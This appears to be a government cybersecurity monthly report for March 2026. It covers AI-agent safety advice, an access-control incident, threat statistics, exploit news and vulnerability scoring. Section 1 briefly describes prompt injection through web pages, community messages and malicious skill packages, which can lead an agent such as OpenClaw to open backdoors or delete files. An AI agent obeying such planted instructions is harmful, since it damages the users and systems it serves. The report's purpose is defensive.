Cybersecurity Monthly Report (March 2026)

1. Introduction of Cybersecurity
As AI evolves into a personal assistant, bringing efficiency and convenience, here are five essential cybersecurity safeguards you must know.
With the rapid development of artificial intelligence (AI) technology, "AI agents" with autonomous execution capabilities are gradually becoming the focus. The recently popular open-source project OpenClaw (commonly known as "Little Lobster" or "Lobster") exemplifies this trend. These tools can not only proactively complete tasks and connect to external services, but also operate operating systems, transforming AI from a simple auxiliary tool into an omnipotent digital manager.

Agent-type AI is smart and efficient, but it also needs to guard against its potential risks.
However, when enjoying the ultimate efficiency brought by AI, do you also leave the system door open? Hidden security threats? In order to actually understand the application services of agent-based AI, we interviewed users. The interviewees said that they usually use OpenClaw to upload calendars, purchase daily necessities, compare prices and other non-sensitive matters, and found that this tool indeed brings great convenience. In the past, information that needed to be sorted out by oneself can now be completed directly by the AI assistant by just giving instructions or taking screenshots. Respondents even said that lobsters are very smart and learn very quickly, responding just like real people. However, the interviewee was aware of its potential risks in the early stages of introduction. Unlike general generative AI, OpenClaw can independently connect to the Internet, change computer settings, and even install programs. The permissions and risks are extremely high, so the interviewee installed Lobster in a cloud virtual machine (VM), separated from the physical environment, and only used for handling general affairs.
In fact, this respondent's risk awareness is anything but paranoid. With this type of AI agent tool, the risks are comprehensive. Attackers do not need to hack into the host. As long as they bury malicious instructions in web pages or community messages that the AI will read, they may trick the AI into helping hackers open backdoors, delete files, or format them. Third-party "skill packages" available for download on the Internet may also contain download links or malicious instructions for malicious programs. Not to mention that after the AI operates for 24 hours, in order to save memory, it will often trigger "memory compression" and cause "amnesia", forgetting the safety rules originally set by the user.

Five security protection suggestions for introducing agent-based AI
In order to strike a balance between ultimate convenience and information security defense, the Information Security Administration recommends that everyone consider the following practices when introducing this new type of AI tools:
(1) Implement environment isolation: Install it in an independent environment. Do not install the AI agent on the main computer where secrets are stored or for daily work. Instead, keep it on another brand-new, formatted computer, or in a dedicated virtual machine (VM) or container (Container).

(2) Only "temporary access": Register an exclusive independent account (including a dedicated email and social platform account) for the AI agent to avoid providing the account and password used by individuals for daily use directly to the AI agent. If the AI agent must log in to external services, it is recommended to set up time-sensitive temporary authorization credentials. The permissions will automatically expire when the time expires to avoid account theft due to neglect of management in the future.

(3) Set up a human "braking" mechanism: For high-risk operations (such as accessing certificates, sending emails, or executing system commands), manual review should be mandatory in the system settings, requiring manual confirmation by personnel before each execution can be released.

(4) Write safety rules into "long-term memory": regularly review and back up the AI's long-term memory files. Be sure to write important security restrictions (for example, personnel consent is required before deleting emails) directly into the "core memory file" (for example: Lobster's MEMORY.md) to ensure that security rules are forced to be loaded every time it is run, to avoid forgetting the set protection settings due to memory compression.

(5) Carefully check the skill package: Before installing any third-party skill expansion package, a complete security scan of its content description and program code should be performed. If you find any suspicious behavior such as requests to download unknown files or connect to unknown websites in the content, you should stop the installation immediately and report it to the platform.
When using new types of software or services, everyone can grasp one principle: "If you cannot control or determine the tools that can avoid risks, you should use them with caution, and you must be aware of security when doing anything." The powerful autonomous learning and operation capabilities of current agent-based AI can undoubtedly effectively improve work efficiency, but only by properly planning the protection mechanism can we truly enjoy the digital convenience brought by AI with peace of mind.

2. Recent Cybersecurity Incident Sharing
The permission control of the project system failed, and the independent network segment was not monitored and became a blind spot in information security.
The agency received external intelligence indicating that a project system within its jurisdiction had a Broken Access Control vulnerability, allowing unauthorized personnel to read, modify or delete project participant information. It was found that the system was a self-developed application. Due to the insufficient authority verification mechanism, and the independent network used for the project was not included in the agency's information security monitoring scope, the information unit was unable to grasp system risks in real time. The agency has urgently cut off external connections and is conducting clarification and repair work on the scope of the impact.

Lessons Learned
Organizations applying for independent networks for business or project needs may create blind spots in security monitoring and management if they fail to simultaneously implement the protection requirements of the organization's cybersecurity responsibility level. It is recommended that organizations incorporate independent networks and project systems into the overall cybersecurity governance framework and reduce overall protection weaknesses through regular reviews and institutionalized management. 

(1) When applying for dedicated network lines, all units should configure necessary protective measures (such as firewalls and intrusion detection) according to the agency's cybersecurity responsibility level requirements and include them in the agency's cybersecurity control (SOC) scope. Simultaneously, they should regularly review the network architecture and external connections to ensure all networks are under management.

(2) For self-developed or outsourced systems, cybersecurity audits should be incorporated into the development and deployment process, with particular emphasis on strengthening the design of access control mechanisms. After deployment, regular vulnerability scans or inspections should be conducted, and the status of patching should be continuously monitored.

(3) Regularly inventory external lines and network equipment to prevent unauthorized connections. Projects using dedicated networks should be included in internal audits and regular reviews to ensure their protective measures remain effective and comply with the agency's cybersecurity requirements.

3. Cybersecurity Trends
3.1 National Government Cybersecurity Threat Trends
Ex ante joint defense and monitoring
This month,a total of 73,093 cybersecurity joint defense intelligence items were collected from government agencies, (an increase of 12,329 items). Among identifiable threat categories, information collection ranked first (49%), primarily involving the acquisition of information through techniques such as scanning, probing and social engineering. This was followed by intrusion attempts (24%), mainly involving attempts to access unauthorized hosts, and intrusion attacks (11%), most of which involved unauthorized system access or the acquisition of system or user privileges. The distribution of intelligence volume over the past year is shown in Figure 1.

Figure 1: Statistics of cybersecurity monitoring intelligence in joint defense

From Phishing Emails to Memory Execution: An Analysis of Stealth PowerShell Attacks 
Further analysis of joint defense intelligence reveals that hackers have recently been using social engineering emails to trick users into executing shortcut files, thereby triggering multi-stage PowerShell scripts. These scripts download malware from legitimate cloud services and execute it in memory, reducing the risk of detection. The off-ground attack method used by the hackers allows the malware to execute directly in memory, avoiding the need for files to be written to the hard drive, thus reducing the chance of detection by antivirus software or cybersecurity devices. This intelligence has been provided to various organizations for joint defense monitoring and protection recommendations.

In-process reporting and responding
This month, a total of 55 reported cybersecurity incidents were recorded, representing 67% of the volume from the same period last year. The majority of reported incidents were categorized as illegal intrusions, accounting for 65.45% of the total. Past cases primarily involved counterfeit communication software; however, recent observations suggest attackers have expanded to other types of software. Incidents stemming from "using/downloading applications/kits from unknown sources" accounted for 10.90% of all reported cases. Statistics for cybersecurity incident reports over the past year are illustrated in Figure 2.

Figure 2: Statistics of cybersecurity incident reports

3.2 Important Vulnerability Alerts

Alert Explanations:
Vulnerability Alert: Verified vulnerabilities that have not yet been widely exploited by attackers. It is recommended to arrange updates as soon as possible.
Known Exploited Vulnerability: Known instances of successful attacks exploiting the vulnerability. Immediate evaluation and patching are strongly recommended.

4. International Cybersecurity News 
CISA Confirms Active Exploitation of FileZen CVE-2026-25108 Vulnerability
(Source: The Hacker News)
CISA confirmed active exploitation of CVE-2026-25108 (CVSS: 8.7), a critical OS command injection vulnerability in Soliton Systems FileZen file transfer software. The vulnerability allows an authenticated user with general privileges to execute arbitrary OS commands via specially crafted HTTP requests, potentially leading to system compromise. The flaw affects FileZen versions 4.2.1 to 4.2.8 and 5.0.0 to 5.0.10. Soliton said that the issue is exploitable when the Antivirus Check Option is enabled and reported at least one exploitation incident. The company advised users to immediately upgrade to version 5.0.11 or later, and change all user passwords to mitigate risk. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and recommended that Federal Civilian Executive Branch (FCEB) agencies apply fixes by March 17.

Someone has Publicly Leaked an Exploit Kit That can Hack Millions of iPhones
(Source: Tech Republic)
A new version of the DarkSword hacking toolkit was leaked and published on GitHub, enabling easy exploitation of iPhones and iPads running older iOS versions, especially iOS 18 or earlier. The toolkit’s simplicity, consisting of HTML and JavaScript, means attackers with minimal technical expertise can deploy it rapidly. DarkSword allows attackers to read and exfiltrate forensically relevant files from iPhone or iPad, including contacts, messages, call history and iOS keychain secrets, sending them to attacker-controlled servers. Apple told TechCrunch that they are aware of the exploit targeting devices running older and out-of-date operating systems and has issued an emergency update on March 11 for devices unable to run recent versions of iOS. Apple also advised users to enable Lockdown Mode to mitigate riskent response plans.

5. Cybersecurity Announcements
To improve the effectiveness of vulnerability management in various agencies and prioritize the handling of key risks, our agency has compiled three international cybersecurity vulnerability assessment indicators (VANS) for reference.
(1) Taking into account the rapid increase in information security threat trends and practical needs for vulnerability management, in order to assist various organizations in strengthening the effectiveness of vulnerability management of information systems and related assets, our Information Security Vulnerability Notification System (VANS) has now included the following 3 internationally commonly used information security vulnerability assessment indicators; organizations can grasp key risks that need to be prioritized through the comprehensive use of vulnerability assessment indicator information:

i. CVSS (Common Vulnerability Scoring System): refers to the severity index of vulnerabilities, currently maintained by the Forum of International Organizations' Information Security Incident Response Teams (FIRST). This indicator quantifies the technical details of the vulnerability into scores ranging from 0.0 to 10.0, and divides it into severity levels such as Critical (9.0~10.0), High (7.0~8.9), Medium (4.0~6.9), Low (0.1~3.9), and None (0.0).

ii. KEV (Known Exploited Vulnerabilities): refers to a list of known exploited security vulnerabilities, maintained by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). By evaluating the actual situation of vulnerability exploitation, it reminds agencies to prioritize vulnerabilities that have been exploited by hackers for network attacks to reduce major security risks.

iii. EPSS (Exploit Prediction Scoring System): refers to the indicator that predicts the probability of vulnerability being exploited, proposed by the Forum of Information Security Incident Response Teams (FIRST), an international organization. This indicator uses a machine learning model to predict the possibility of a vulnerability being exploited by hackers in the next 30 days (presented on a scale of 0 to 1, representing a probability of 0% to 100%).

(2) Application examples: For information security vulnerabilities that are CVSS 7.0 or above and marked as KEV, resources will be invested first, and immediate patching or mitigation measures can be taken, and EPSS ranking can be used to further determine the processing sequence.

(3) The operation instructions for the above functions have been updated simultaneously in the VANS education and training textbook and posted on the VANS section of the official website of the National Information Security Research Institute at https://gov.tw/Q47. If you still have questions about system operation after reading the textbook, you can contact the technical customer service window at (02) 6631-6423or email [email protected]./

6. Laest Cybersecurity Conferences and Events